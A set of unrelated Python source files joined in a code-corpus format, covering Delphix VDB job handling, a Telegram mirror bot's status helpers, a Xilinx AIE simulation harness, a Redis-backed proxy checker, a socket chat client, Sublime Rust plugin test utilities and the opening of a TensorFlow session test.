database_obj = find_obj_by_name(engine, server, database,
arguments['--vdb'])
except dlpxException, e:
print '\nERROR: %s\n' % (e.message)
sys.exit(1)
thingstodo = ["thingtodo"]
#reset the running job count before we begin
i = 0
with job_mode(server):
while (len(jobs) > 0 or len(thingstodo)> 0):
if len(thingstodo)> 0:
if arguments['--start']:
vdb_operation(engine, server, jobs, database_name, 'start')
elif arguments['--stop']:
vdb_operation(engine, server, jobs, database_name, 'stop')
elif arguments['--enable']:
vdb_operation(engine, server, jobs, database_name,
'enable')
elif arguments['--disable']:
vdb_operation(engine, server, jobs, database_name,
'disable')
elif arguments['--list']:
list_databases(engine, server, jobs)
thingstodo.pop()
#get all the jobs, then inspect them
i = 0
for j in jobs.keys():
job_obj = job.get(server, jobs[j])
print_debug(job_obj)
print_info(engine["hostname"] + ": VDB Operations: " +
job_obj.job_state)
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
#If the job is in a non-running state, remove it from the
# running jobs list.
del jobs[j]
else:
#If the job is in a running state, increment the running
# job count.
i += 1
print_info(engine["hostname"] + ": " + str(i) + " jobs running. ")
#If we have running jobs, pause before repeating the checks.
if len(jobs) > 0:
sleep(float(arguments['--poll']))
def run_job(engine):
"""
This function runs the main_workflow aynchronously against all the servers
specified
"""
#Create an empty list to store threads we create.
threads = []
#If the --all argument was given, run against every engine in dxtools.conf
if arguments['--all']:
print_info("Executing against all Delphix Engines in the dxtools.conf")
#For each server in the dxtools.conf...
for delphix_engine in dxtools_objects:
engine = dxtools_objects[delphix_engine]
#Create a new thread and add it to the list.
threads.append(main_workflow(engine))
else:
#Else if the --engine argument was given, test to see if the engine
# exists in dxtools.conf
if arguments['--engine']:
try:
engine = dxtools_objects[arguments['--engine']]
print_info("Executing against Delphix Engine: " +
arguments['--engine'])
except:
print_error("Delphix Engine \"" + arguments['--engine'] +
"\" cannot be found in " + config_file_path)
print_error("Please check your value and try again. Exiting")
sys.exit(1)
#Else if the -d argument was given, test to see if the engine exists
# in dxtools.conf
elif arguments['-d']:
try:
engine = dxtools_objects[arguments['-d']]
print_info("Executing against Delphix Engine: " +
arguments['-d'])
except:
print_error("Delphix Engine \"" + arguments['-d'] +
"\" cannot be found in " + config_file_path)
print_error("Please check your value and try again. Exiting")
sys.exit(1)
else:
#Else search for a default engine in the dxtools.conf
for delphix_engine in dxtools_objects:
if dxtools_objects[delphix_engine]['default'] == 'true':
engine = dxtools_objects[delphix_engine]
print_info("Executing against the default Delphix Engine "
"in the dxtools.conf: " +
dxtools_objects[delphix_engine]['hostname'])
break
if engine == None:
print_error("No default engine found. Exiting")
sys.exit(1)
#run the job against the engine
threads.append(main_workflow(engine))
#For each thread in the list...
for each in threads:
#join them back together so that we wait for all threads to complete
# before moving on
each.join()
def serversess(f_engine_address, f_engine_username, f_engine_password):
"""
Function to setup the session with the Delphix Engine
"""
server_session= DelphixEngine(f_engine_address, f_engine_username,
f_engine_password, "DOMAIN")
return server_session
def set_exit_handler(func):
"""
This function helps us set the correct exit code
"""
signal.signal(signal.SIGTERM, func)
def time_elapsed():
"""
This function calculates the time elapsed since the beginning of the script.
Call this anywhere you want to note the progress in terms of time
"""
elapsed_minutes = round((time() - time_start)/60, +1)
return elapsed_minutes
def update_jobs_dictionary(engine, server, jobs):
"""
This function checks each job in the dictionary and updates its status or
removes it if the job is complete.
Return the number of jobs still running.
"""
#Establish the running jobs counter, as we are about to update the count
# from the jobs report.
i = 0
#get all the jobs, then inspect them
for j in jobs.keys():
job_obj = job.get(server, jobs[j])
print_debug(engine["hostname"] + ": " + str(job_obj))
print_info(engine["hostname"] + ": " + j.name + ": " +
job_obj.job_state)
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
#If the job is in a non-running state, remove it from the running
# jobs list.
del jobs[j]
else:
#If the job is in a running state, increment the running job count.
i += 1
return i
def main(argv):
#We want to be able to call on these variables anywhere in the script.
global single_thread
global usebackup
global time_start
global config_file_path
global database_name
global host_name
global dxtools_objects
try:
logging_est(arguments['--logdir'])
print_debug(arguments)
time_start = time()
engine = None
single_thread = False
config_file_path = arguments['--config']
#Parse the dxtools.conf and put it into a dictionary
dxtools_objects = get_config(config_file_path)
database_name = arguments['--vdb']
#This is the function that will handle processing main_workflow for
# all the servers.
run_job(engine)
elapsed_minutes = time_elapsed()
print_info("script took " + str(elapsed_minutes) +
" minutes to get this far.")
#Here we handle what we do when the unexpected happens
except SystemExit as e:
"""
This is what we use to handle our sys.exit(#)
"""
sys.exit(e)
except HttpError as e:
"""
We use this exception handler when our connection to Delphix fails
"""
print_error("Connection failed to the Delphix Engine")
print_error( "Please check the ERROR message below")
print_error(e.message)
sys.exit(2)
except JobError as e:
"""
We use this exception handler when a job fails in Delphix so that we have actionable data
"""
print_error("A job failed in the Delphix Engine")
print_error(e.job)
elapsed_minutes = time_elapsed()
print_info(basename(__file__) + " took " + str(elapsed_minutes) + " minutes to get this far.")
sys.exit(3)
except KeyboardInterrupt:
"""
We use this exception handler to gracefully handle ctrl+c exits
"""
print_debug("You sent a CTRL+C to interrupt the process")
elapsed_minutes = time_elapsed()
print_info(basename(__file__) + " took " + str(elapsed_minutes) + " minutes to get this far.")
except:
"""
Everything else gets caught here
"""
print_error(sys.exc_info()[0])
print_error(traceback.format_exc())
elapsed_minutes = time_elapsed()
print_info(basename(__file__) + " took " + str(elapsed_minutes) + " minutes to get this far.")
sys.exit(1)
if __name__ == "__main__":
#Grab our arguments from the doc at the top of the script
arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
#Feed our arguments to the main function, and off we go!
main(arguments)
|
bot_utils.py | import logging
import re
import threading
import time
import math
from bot.helper.telegram_helper.bot_commands import BotCommands
from bot import dispatcher, download_dict, download_dict_lock, STATUS_LIMIT
from telegram import InlineKeyboardMarkup
from telegram.ext import CallbackQueryHandler
from bot.helper.telegram_helper import button_build, message_utils
LOGGER = logging.getLogger(__name__)
MAGNET_REGEX = r"magnet:\?xt=urn:btih:[a-zA-Z0-9]*"
URL_REGEX = r"(?:(?:https?|ftp):\/\/)?[\w/\-?=%.]+\.[\w/\-?=%.]+"
COUNT = 0
PAGE_NO = 1
class MirrorStatus:
STATUS_UPLOADING = "Uploading...📤"
STATUS_DOWNLOADING = "Downloading...📥"
STATUS_CLONING = "Cloning...♻️"
STATUS_WAITING = "Queued...📝"
STATUS_FAILED = "Failed 🚫. Cleaning Download..."
STATUS_ARCHIVING = "Archiving...🔐"
STATUS_EXTRACTING = "Extracting...📂"
PROGRESS_MAX_SIZE = 100 // 8
PROGRESS_INCOMPLETE = ['▏', '▎', '▍', '▌', '▋', '▊', '▉']
SIZE_UNITS = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']
class setInterval:
def __init__(self, interval, action):
self.interval = interval
self.action = action
self.stopEvent = threading.Event()
thread = threading.Thread(target=self.__setInterval)
thread.start()
def __setInterval(self):
nextTime = time.time() + self.interval
while not self.stopEvent.wait(nextTime - time.time()):
nextTime += self.interval
self.action()
def cancel(self):
self.stopEvent.set()
def get_readable_file_size(size_in_bytes) -> str:
if size_in_bytes is None:
return '0B'
index = 0
while size_in_bytes >= 1024:
size_in_bytes /= 1024
index += 1
try:
return f'{round(size_in_bytes, 2)}{SIZE_UNITS[index]}'
except IndexError:
return 'File too large'
def getDownloadByGid(gid):
with download_dict_lock:
for dl in download_dict.values():
status = dl.status()
if status != MirrorStatus.STATUS_ARCHIVING and status != MirrorStatus.STATUS_EXTRACTING:
if dl.gid() == gid:
return dl
return None
def getAllDownload():
with download_dict_lock:
for dlDetails in list(download_dict.values()):
if dlDetails.status() == MirrorStatus.STATUS_DOWNLOADING or dlDetails.status() == MirrorStatus.STATUS_WAITING:
if dlDetails:
return dlDetails
return None
def get_progress_bar_string(status):
completed = status.processed_bytes() / 8
total = status.size_raw() / 8
if total == 0:
p = 0
else:
p = round(completed * 100 / total)
p = min(max(p, 0), 100)
cFull = p // 8
cPart = p % 8 - 1
p_str = '█' * cFull
if cPart >= 0:
p_str += PROGRESS_INCOMPLETE[cPart]
p_str += ' ' * (PROGRESS_MAX_SIZE - cFull)
p_str = f"[{p_str}]"
return p_str
def get_readable_message():
with download_dict_lock:
msg = ""
INDEX = 0
if STATUS_LIMIT is not None:
dick_no = len(download_dict)
global pages
pages = math.ceil(dick_no/STATUS_LIMIT)
if PAGE_NO > pages and pages != 0:
globals()['COUNT'] -= STATUS_LIMIT
globals()['PAGE_NO'] -= 1
for download in list(download_dict.values()):
INDEX += 1
if INDEX > COUNT:
msg += f"<b>Filename:</b> <code>{download.name()}</code>"
msg += f"\n<b>Status:</b> <i>{download.status()}</i>"
if download.status() != MirrorStatus.STATUS_ARCHIVING and download.status() != MirrorStatus.STATUS_EXTRACTING:
msg += f"\n<code>{get_progress_bar_string(download)} {download.progress()}</code>"
if download.status() == MirrorStatus.STATUS_DOWNLOADING:
msg += f"\n<b>Downloaded:</b> {get_readable_file_size(download.processed_bytes())} of {download.size()}"
elif download.status() == MirrorStatus.STATUS_CLONING:
msg += f"\n<b>Cloned:</b> {get_readable_file_size(download.processed_bytes())} of {download.size()}"
else:
msg += f"\n<b>Uploaded:</b> {get_readable_file_size(download.processed_bytes())} of {download.size()}"
msg += f"\n<b>Speed:</b> {download.speed()}" \
f", <b>ETA:</b> {download.eta()} "
# if hasattr(download, 'is_torrent'):
try:
msg += f"\n<b>Seeders:</b> {download.aria_download().num_seeders}" \
f" | <b>Peers:</b> {download.aria_download().connections}"
except:
pass
msg += f"\n<b>To Stop:</b> <code>/{BotCommands.CancelMirror} {download.gid()}</code>"
msg += "\n\n"
if STATUS_LIMIT is not None:
if INDEX >= COUNT + STATUS_LIMIT:
break
if STATUS_LIMIT is not None:
if INDEX > COUNT + STATUS_LIMIT:
return None, None
if dick_no > STATUS_LIMIT:
msg += f"Page: {PAGE_NO}/{pages} | Tasks: {dick_no}\n"
buttons = button_build.ButtonMaker()
buttons.sbutton("Previous", "pre")
buttons.sbutton("Next", "nex")
button = InlineKeyboardMarkup(buttons.build_menu(2))
return msg, button
return msg, ""
def flip(update, context):
query = update.callback_query
query.answer()
global COUNT, PAGE_NO
if query.data == "nex":
if PAGE_NO == pages:
COUNT = 0
PAGE_NO = 1
else:
COUNT += STATUS_LIMIT
PAGE_NO += 1
elif query.data == "pre":
if PAGE_NO == 1:
COUNT = STATUS_LIMIT * (pages - 1)
PAGE_NO = pages
else:
COUNT -= STATUS_LIMIT
PAGE_NO -= 1
message_utils.update_all_messages()
def get_readable_time(seconds: int) -> str:
result = ''
(days, remainder) = divmod(seconds, 86400)
days = int(days)
if days != 0:
result += f'{days}d'
(hours, remainder) = divmod(remainder, 3600)
hours = int(hours)
if hours != 0:
result += f'{hours}h'
(minutes, seconds) = divmod(remainder, 60)
minutes = int(minutes)
if minutes != 0:
result += f'{minutes}m'
seconds = int(seconds)
result += f'{seconds}s'
return result
def is_url(url: str):
url = re.findall(URL_REGEX, url)
if url:
return True
return False
def is_gdrive_link(url: str):
return "drive.google.com" in url
def is_mega_link(url: str):
return "mega.nz" in url or "mega.co.nz" in url
def get_mega_link_type(url: str):
if "folder" in url:
return "folder"
elif "file" in url:
return "file"
elif "/#F!" in url:
return "folder"
return "file"
def is_magnet(url: str):
magnet = re.findall(MAGNET_REGEX, url)
if magnet:
return True
return False
def new_thread(fn):
"""To use as decorator to make a function call threaded.
Needs import
from threading import Thread"""
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
next_handler = CallbackQueryHandler(flip, pattern="nex", run_async=True)
previous_handler = CallbackQueryHandler(flip, pattern="pre", run_async=True)
dispatcher.add_handler(next_handler)
dispatcher.add_handler(previous_handler)
|
run_traffic_gen.py | #
#© Copyright 2021 Xilinx, Inc.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
#
import os
os.environ['OPENBLAS_NUM_THREADS'] = '1'
from xilinx_xtlm import ipc_axis_master_util
from xilinx_xtlm import ipc_axis_slave_util
from xilinx_xtlm import xtlm_ipc
import struct
import multiprocessing as mp
import numpy as np
import copy as copy
import matplotlib.pyplot as plt
import sys
class IQData():
def __init__(self, numpy_cplx_data,aietype='cint16',plio_width=32,supressplots=0):
""" Initialization """
self.input_cplx_data = numpy_cplx_data
self.parent_conn0, self.child_conn0 = mp.Pipe()
self.aietype = aietype
self.plio_width = plio_width
self.rx_payload_len = -1
self.tx_payload_len = -1
self.supressplots = supressplots
def self_test(self):
print("inside self_test")
self.input_cplx_data = MakeCountingPattern(16)
#self.plot_results(self.input_cplx_data,iqdata)
t1 = self.convert_numpy_to_bytes()
self.convert_bytes_to_numpy(t1)
def rx_from_aie(self):
payload = self.rx_axis.sample_transaction()
#This call blocks until the AIE passes some data to the AXI SIM IPC SLAVE
cvec = self.convert_bytes_to_numpy(payload.data)
self.child_conn0.send(cvec)
print("Received AIE Output. Sending to parent thread for processing")
def tx_to_aie(self,iq_data_as_bytes,test):
NumBytesToSend = len(iq_data_as_bytes)
#print("xmit: len Bytes = %d" % NumBytesToSend)
NumBytesPerBeat = self.plio_width//8
NumTrans = NumBytesToSend//NumBytesPerBeat
print("NumBytesToSend=%d,NumBytesPerTransaction=%d,TotalTransactions=%d" % (NumBytesToSend,NumBytesPerBeat,NumTrans))
for i in range(NumTrans):
data2send = iq_data_as_bytes[(i*NumBytesPerBeat):(i*NumBytesPerBeat)+NumBytesPerBeat]
#Stride through byte array in steps of BytesPerBeat
payload = xtlm_ipc.axi_stream_packet()
#Create a axi stream packet object
payload.data_length = NumBytesPerBeat
#Tell the object how much data will be sent in bytes
if(i == NumTrans-1):
payload.tlast = True
print("Tlast sent!")
else:
payload.tlast = False
payload.data =data2send
self.tx_axis.b_transport(payload)
#Send the data to the ipc master
print("Finished sending")
def run_test(self, ipc=False):
if ipc:
self.tx_axis = ipc_axis_master_util("tx_iqdata")
self.rx_axis = ipc_axis_slave_util("rx_iqdata")
#Create both Master and Slave ipc utils.
#The argument strings must match the names in system.cfg
self.tx_to_aie(self.convert_numpy_to_bytes(),False)
print("Data sent to AIE. Waiting for results...this may take a few minutes")
if ipc:
p= mp.Process(target=self.rx_from_aie())
p.start()
aie_output = self.parent_conn0.recv()
print("Data received from AIE ")
p.join()
if (not self.supressplots):
self.plot_results(self.input_cplx_data,aie_output)
input("Enter any key to end simulation")
self.rx_axis.disconnect()
self.tx_axis.end_of_simulation()
print("Disconnected all IPC handles.. done!")
def convert_numpy_to_bytes(self):
L = len(self.input_cplx_data)
data = self.input_cplx_data
if(self.aietype == "cint16"):
rVec = np.real(data).astype(np.int16)
iVec = np.imag(data).astype(np.int16)
out2column = np.zeros((L,2)).astype(np.int16)
elif(self.aietype =='cfloat'):
print("cfloat!")
rVec = np.real(data)
iVec = np.imag(data)
out2column = np.zeros((L,2)).astype(np.single)
else:
print("Not supported type!")
out2column[:,0] = rVec
out2column[:,1] = iVec
#print("Byte array to send")
#print(''.join(r'\x'+hex(letter)[2:] for letter in out2column.tobytes()))
#print("outlen=")
return out2column.tobytes()
def convert_bytes_to_numpy(self,byte_arry):
if(self.aietype == "cint16"):
formatString = "<"+str(len(byte_arry)//2)+"h"
upack = struct.unpack(formatString, byte_arry)
ivec = upack[0:len(upack):2]
rvec = upack[1:len(upack):2]
elif(self.aietype =='cfloat'):
formatString = "<"+str(len(byte_arry)//4)+"f"
upack = struct.unpack(formatString, byte_arry)
print("Len Rx Array=")
print(len(byte_arry))
ivec = upack[0:len(upack):2]
rvec = upack[1:len(upack):2]
else:
print("Not supported type!")
cVec = np.array(rvec) + 1j*np.array(ivec)
return cVec
def plot_results(self,aie_in,aie_out,style='t'):
##AIE IN
# plt.plot( list(range(0,len(aie_in))) ,np.real(aie_in),label ="aie_in R")
# plt.plot( list(range(0,len(aie_in))) ,np.imag(aie_in),label ="aie_in I")
#Perform Golden Operation on AIE IN to generate Golden/reference output
golden_iq_out = np.fft.fftshift(np.fft.fft(aie_in))
golden_iq_out = golden_iq_out/4 #DSPLIB FFT HAS OUTPUT = MATLAB*4. Compensate for this.
aie_out_shft = np.fft.fftshift(aie_out)
plt.plot( list(range(0,len(golden_iq_out))),np.abs(golden_iq_out),label ="Golden FFT - MAG",marker="+")
plt.plot( list(range(0,len(aie_out))) ,np.abs(aie_out_shft),label ="AIE OUT - MAG")
plt.legend()
plt.show()
def MakeInputStim(Nsamps=1024):
n = np.arange(0,Nsamps)
Fs = 245.76e6
Ftone = 30.72e6/16
cplxTone = 1.0* np.exp(-2*1j*np.pi*Ftone/Fs*n)
Nbits = 16-4
Nbits = Nbits -2 #removed additional bits to help with FFT processing gain
mx = np.max(np.abs(cplxTone))
cscaled = np.round(cplxTone/mx * 2**(Nbits-1)-1)
return cscaled
def MakeCountingPattern(Nsamps=16):
n = np.arange(0,Nsamps)
nneg = -1*np.arange(0,Nsamps)
cscale = n + 1j*nneg
return cscale
if __name__ == "__main__":
for i, arg in enumerate(sys.argv):
if( i == 1):
cmd_line_pliowidth = int(arg)
if( i == 2):
skipplots=int(arg)
print(skipplots)
NSamps=128
iqdata =MakeInputStim(NSamps)
#iqdata = MakeCountingPattern(NSamps)
obj = IQData(iqdata,aietype="cint16",plio_width=cmd_line_pliowidth,supressplots=skipplots)
obj.run_test(ipc=True)
print("TEST PASSED") |
ip_db.py | import requests
import telnetlib
from threading import Lock,Thread
from apis import Apis
from random import choice
import redis
import time
from qq_hook import Hook
from settings import Ip_db_settings
c=Ip_db_settings()
apis=Apis()
#读setting
send_to_qq=c.send_to_qq
t_num=c.t_num
tel_timeout=c.tel_timeout
apis.timeout=c.api_timeout
#
pool=redis.ConnectionPool(host='127.0.0.1',port=6379,max_connections=200)
num=0
l=Lock()
def cut(text,num):#将列表text分为num份
if len(text)<num:
print('\033[1;33m['+str(num)+' is too big.]\033[0m')
if len(text)%num!=0:
t=len(text)//num+1
else:
t=len(text)/num
t=int(t)
s=[]
for i in range(0,len(text),t):
b=text[i:i+t]
s.append(b)
return s
def multi_thread(func,args,num):
t=[]
args=cut(args,num)
for each in range(len(args)):
temp=Thread(target=func,args=(each,args[each]))
temp.start()
t.append(temp)
for each in t:
each.join()
def telnet_check(ip,port):
try:
#print(ip,port)
telnetlib.Telnet(ip, port=port, timeout=tel_timeout)
return True
except Exception as e:
#print(str(e))
#print(f'\033[1;31m{ip}telnet_check:failed\033[0m')
return 0
def main(id,prs):
global results,num
conn = redis.Redis(connection_pool=pool,decode_responses=True)
r=[]
print(str(id)+' runing')
for each in prs:
if telnet_check(each.split(':')[0],each.split(':')[1]):
if getattr(apis,choice(apis.api_names))(each):
print(f'\033[1;36mCongratulations! {each} Successful!\033[0m')
conn.set(each,0)
print(f'[redis:{each} 写入]')
l.acquire()
num+=1
l.release()
def check_one(prs):
if telnet_check(each.split(':')[0],each.split(':')[1]):
if getattr(apis,choice(apis.api_names))(each):
return True
else:
return False
else:
return False
if __name__ == '__main__':
hook=Hook(2)
prs=[]
f=open('src/prs.txt','r')
for each in f:
prs.append(each.strip('\n',).strip())
f.close()
prelen=len(prs)
prs=list(set(prs))
aftlen=len(prs)
start_time=time.time()
if send_to_qq:
hook.send(f'[开始检测]\\n[输入数据:{str(prelen)}条]\\n[重复数据:{str(prelen-aftlen)}条]\\n[有效输入数据:{str(aftlen)}条]\\n[线程数:{str(t_num)}]\\nPlease wait.......')
hook.send(f'[telnet检测超时时间:{tel_timeout}]\\n[api检测超时时间:{apis.timeout}]')
multi_thread(main,prs,t_num)
end_time=time.time()
print('\033[1;36m完毕')
print(f'\033[1;36m输入数据:{str(prelen)}条')
print(f'重复数据:{str(prelen-aftlen)}条')
print(f'有效输入数据:{str(aftlen)}条')
print(f'本次录入:{str(num)}条')
print(f'用时{end_time-start_time}秒')
if send_to_qq:
hook.send(f'[检测完毕]\\n[本次录入:{str(num)}条]\\n[用时:{str(int(end_time-start_time))}秒]')
|
main.py | from online import online
import threading
import time
instance = None
received = '1'
sent = '1'
name = input("What's your name?\n> ")
def receiving():
global received
global sent
while(received!='0' and sent!='0'):
received = instance.any_receive_mesage()
print(received)
def sending():
global sent
global received
global name
instance.any_send_mesage("*"+name+" joined the chat*\n")
while(sent!='0' and received!='0'):
sent = input("")
if(sent=="0"):
instance.any_send_mesage("*"+name+" left the chat*\n> Type Enter to Quit\n")
break
instance.any_send_mesage(name+": "+sent)
choose = input("1-Server\n Any-Client\n")
max_connections = 2
max_bytes = 1024
port = 1502
host = ""
if(choose=='1'):
instance = online(host, port, max_connections, max_bytes, True)
instance.start_server()
else:
host = input("Chat IP: ")
instance = online(host, port, max_connections, max_bytes, False)
instance.start_client()
print('\n-Status: CHAT ON-\n*Type \'0\' and \'Enter\' to quit the chat*\n')
t1 = threading.Thread(target=receiving)
t2 = threading.Thread(target=sending)
t1.start()
t2.start()
while(t1.is_alive() and t2.is_alive()):
time.sleep(1)
print("\nChat ended.")
|
rust_test_common.py | import sublime
import queue
import sys
import os
import unittest
import subprocess
import threading
import time
# Used for debugging.
from pprint import pprint
# Depends on how you install the plugin.
plugin = sys.modules.get('sublime-rust',
sys.modules.get('Rust Enhanced', None))
if not plugin:
raise ValueError('Couldn\'t find Rust Enhanced plugin.')
plugin_path = tuple(plugin.__path__)[0]
if plugin_path.endswith('.sublime-package'):
raise ValueError('Cannot run test with compressed package.')
rust_proc = plugin.rust.rust_proc
rust_thread = plugin.rust.rust_thread
cargo_settings = plugin.rust.cargo_settings
cargo_config = plugin.rust.cargo_config
target_detect = plugin.rust.target_detect
messages = plugin.rust.messages
themes = plugin.rust.themes
util = plugin.rust.util
semver = plugin.rust.semver
def unescape(s):
# python 3.4 can use html.unescape()
return s.replace(' ', ' ')\
.replace('&', '&')\
.replace('<', '<')\
.replace('>', '>')
# This is used to mark overridden configuration variables that should be
# deleted.
DELETE_SENTINEL = 'DELETE_SENTINEL'
class TestBase(unittest.TestCase):
def setUp(self):
window = sublime.active_window()
# Clear any rust project settings.
data = window.project_data()
if not data:
data = {}
# Ensure any user settings don't interfere with the test.
if 'cargo_build' in data.get('settings', {}):
del data['settings']['cargo_build']
# When the tests run automatically, they are not part of a sublime
# project. However, various tests depend on checking relative paths,
# so ensure that `folders` is set.
#
# Set `folder_exclude_patterns` to prevent the Rust build directory
# from being recognized by Sublime. I have a suspicion this causes
# spurious errors on Windows because Sublime may be indexing the
# files, preventing `cargo clean` from being able to remove them.
if 'folders' not in data:
data['folders'] = [{
'path': plugin_path,
'folder_exclude_patterns': ['target'],
}]
window.set_project_data(data)
plugin.cargo_build.ON_LOAD_MESSAGES_ENABLED = False
# Override settings.
self._original_settings = {}
self.settings = sublime.load_settings('RustEnhanced.sublime-settings')
# Ensure all settings are at defaults.
defaults = sublime.load_resource('Packages/%s/RustEnhanced.sublime-settings' % (
util.PACKAGE_NAME,))
defaults = sublime.decode_value(defaults)
for key, value in defaults.items():
self._override_setting(key, value)
self._override_setting('show_panel_on_build', False)
self._override_setting('cargo_build', {})
# Disable incremental compilation (first enabled in 1.24). It slows
# down the tests.
self._override_setting('rust_env', {
'CARGO_INCREMENTAL': '0',
})
# Clear any state.
messages.clear_messages(window)
# Force output panel to clear.
window.create_output_panel(plugin.rust.opanel.PANEL_NAME)
def _override_setting(self, name, value):
"""Tests can call this to override a Sublime setting, which will get
restored once the test is complete."""
if name not in self._original_settings:
if self.settings.has(name):
self._original_settings[name] = self.settings.get(name)
else:
self._original_settings[name] = DELETE_SENTINEL
self.settings.set(name, value)
def _restore_settings(self):
for key, value in self._original_settings.items():
if value is DELETE_SENTINEL:
self.settings.erase(key)
else:
self.settings.set(key, value)
def tearDown(self):
self._restore_settings()
plugin.cargo_build.ON_LOAD_MESSAGES_ENABLED = True
def _get_rust_thread(self, previous_thread=None):
"""Waits for a rust thread to get started and returns it.
:param previous_thread: If set, it will avoid returning this thread.
Use this when there is a thread currently running, and you want to
make sure you get the next thread that starts.
"""
for n in range(1000):
t = rust_thread.THREADS.get(sublime.active_window().id())
if t:
if previous_thread is None or previous_thread != t:
return t
time.sleep(0.01)
raise AssertionError('Rust thread never started.')
def _run_build(self, command='build', **kwargs):
# Unfortunately, you can't pass arbitrary args when running 'build'.
# Although running cargo_exec directly isn't exactly the same as
# running 'build', it's close enough (we aren't using any options in
# the default .sublime-build file).
# window.run_command('build', {'variant': variant})
window = sublime.active_window()
kwargs['command'] = command
window.run_command('cargo_exec', kwargs)
def _run_build_wait(self, command='build', **kwargs):
self._run_build(command, **kwargs)
# Wait for it to finish.
self._get_rust_thread().join()
def _get_build_output(self, window):
opanel = window.find_output_panel(plugin.rust.opanel.PANEL_NAME)
output = opanel.substr(sublime.Region(0, opanel.size()))
return output
def _with_open_file(self, filename, f, **kwargs):
"""Opens filename (relative to the plugin) in a new view, calls
f(view) to perform the tests.
"""
window = sublime.active_window()
path = os.path.join(plugin_path, filename)
if not os.path.exists(path):
# Unfortunately there doesn't seem to be a good way to detect a
# failure to load.
raise ValueError('Can\'t find path %r' % path)
view = window.open_file(path)
q = queue.Queue()
def async_test_view():
try:
# Wait for view to finish loading.
for n in range(500):
if view.is_loading():
time.sleep(0.01)
else:
break
else:
raise AssertionError('View never loaded.')
f(view, **kwargs)
except Exception as e:
q.put(e)
else:
q.put(None)
try:
t = threading.Thread(target=async_test_view)
t.start()
t.join()
msg = q.get()
if msg:
raise msg
finally:
if view.window():
window.focus_view(view)
if view.is_dirty():
view.run_command('revert')
for n in range(500):
if not view.is_dirty():
break
time.sleep(0.01)
else:
raise AssertionError('View did not revert')
window.run_command('close_file')
# I don't know why, but there were problems with sublime
# seg-faulting when the tests were run in Docker (and seemed
# worse with `--cpus 2`). This seems to help.
time.sleep(1)
def _cargo_clean(self, view_or_path):
if isinstance(view_or_path, sublime.View):
path = os.path.dirname(view_or_path.file_name())
else:
path = view_or_path
window = sublime.active_window()
try:
rust_proc.check_output(window,
'cargo clean'.split(),
path)
except subprocess.CalledProcessError as e:
print('Cargo clean failure')
print(e.output)
raise
messages.clear_messages(window)
def _skip_clippy(self):
if 'RE_SKIP_CLIPPY' in os.environ:
print('Skipping Clippy test.')
return True
else:
return False
class AlteredSetting(object):
"""Utility to help with temporarily changing a setting."""
def __init__(self, name, value):
self.name = name
self.value = value
self.settings = sublime.load_settings('RustEnhanced.sublime-settings')
def __enter__(self):
self.orig = self.settings.get(self.name)
self.settings.set(self.name, self.value)
def __exit__(self, type, value, traceback):
self.settings.set(self.name, self.orig)
def __str__(self):
return '%s=%s' % (self.name, self.value)
class UiIntercept(object):
"""Context manager that assists with mocking some Sublime UI components."""
def __init__(self, passthrough=False):
self.passthrough = passthrough
def __enter__(self):
self.phantoms = {}
self.view_regions = {}
self.popups = {}
def collect_popups(v, content, flags=0, location=-1,
max_width=None, max_height=None,
on_navigate=None, on_hide=None):
ps = self.popups.setdefault(v.file_name(), [])
result = {'view': v,
'content': content,
'flags': flags,
'location': location,
'max_width': max_width,
'max_height': max_height,
'on_navigate': on_navigate,
'on_hide': on_hide}
ps.append(result)
if self.passthrough:
filtered = {k: v for (k, v) in result.items() if v is not None}
self.orig_show_popup(**filtered)
def collect_phantoms(v, key, region, content, layout, on_navigate):
ps = self.phantoms.setdefault(v.file_name(), [])
ps.append({
'region': region,
'content': content,
'on_navigate': on_navigate,
})
if self.passthrough:
self.orig_add_phantom(v, key, region, content, layout, on_navigate)
def collect_regions(v, key, regions, scope, icon, flags):
rs = self.view_regions.setdefault(v.file_name(), [])
rs.extend(regions)
if self.passthrough:
self.orig_add_regions(v, key, regions, scope, icon, flags)
m = plugin.rust.messages
self.orig_add_phantom = m._sublime_add_phantom
self.orig_add_regions = m._sublime_add_regions
self.orig_show_popup = m._sublime_show_popup
m._sublime_add_phantom = collect_phantoms
m._sublime_add_regions = collect_regions
m._sublime_show_popup = collect_popups
return self
def __exit__(self, type, value, traceback):
m = plugin.rust.messages
m._sublime_add_phantom = self.orig_add_phantom
m._sublime_add_regions = self.orig_add_regions
m._sublime_show_popup = self.orig_show_popup
def has_nightly():
return subprocess.call(['rustc', '+nightly', '-V']) == 0
|
session_test.py | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import config_pb2
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.util import compat
# NOTE(mrry): Dummy shape registration for op used in the tests.
ops.RegisterShape('ConstructionFails')(None)
class SessionTest(test_util.TensorFlowTestCase):
def testUseExistingGraph(self):
